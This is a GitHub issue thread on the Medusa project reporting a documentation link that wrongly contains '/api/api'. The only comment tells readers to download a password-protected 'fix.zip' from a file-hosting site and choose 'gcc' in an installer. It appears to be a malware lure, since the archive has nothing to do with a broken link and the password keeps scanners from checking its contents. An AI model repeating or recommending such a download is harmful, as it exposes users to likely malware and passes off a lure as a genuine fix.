### ISSUE TITLE
Incorrect doc link

### ISSUE THREAD

**Issue by vbhavsar** [medusajs/medusa#8861]
### What Medusa version and documentation are you using?

v1

### Preliminary Checks

- [X] This issue is not a duplicate. Before opening a new issue, please search existing issues: https://github.com/medusajs/medusa/issues

### Issue Summary

[`How to Manage Regions using Admin APIs`](https://docs.medusajs.com/modules/regions-and-currencies/admin/manage-regions) links to an invalid url `https://docs.medusajs.com/api/api/admin#regions`. Note the double `/api/api`.

### How can this issue be resolved?

Fix the link - remove one occurrence of `/api`

### Are you interested in working on this issue?

- [X] I would like to fix this issue

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
